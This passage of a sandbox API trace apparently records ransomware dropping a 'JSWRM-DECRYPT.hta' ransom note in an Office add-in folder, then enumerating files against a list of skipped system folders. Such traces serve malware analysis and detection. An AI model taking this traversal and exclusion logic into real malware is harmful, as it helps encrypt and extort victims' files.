lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.089] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.090] CloseHandle (hObject=0x314) returned 1 [0124.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0124.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0124.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\jswrm-decrypt.hta")) returned 0x20 [0124.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0124.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0124.091] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x409f0018, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0124.091] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.091] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x409f0018, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.091] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.091] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.091] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7582db3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4cc0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.091] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.092] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x409f0018, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x409f0018, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x409f0018, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.092] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0124.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0124.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0124.093] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5127e7d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5127e7d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5127e7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0124.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0124.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0124.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0124.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0124.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.093] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ea37c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ea37c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.093] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.094] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50b8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.094] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0124.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23fa98 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.095] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13440553, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fb53, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.fr.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2=".") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="..") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="...") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="windows") returned -1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="recovery") returned -1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="perflogs") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="documents and settings") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="system volume information") returned -1 [0124.095] lstrcmpiW (lpString1="PowerViewRes.fr.xap", lpString2="msocache") returned 1 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fr.xap", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.fr.xap", lpUsedDefaultChar=0x0) returned 19 [0124.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fr.xap", cchWideChar=19, 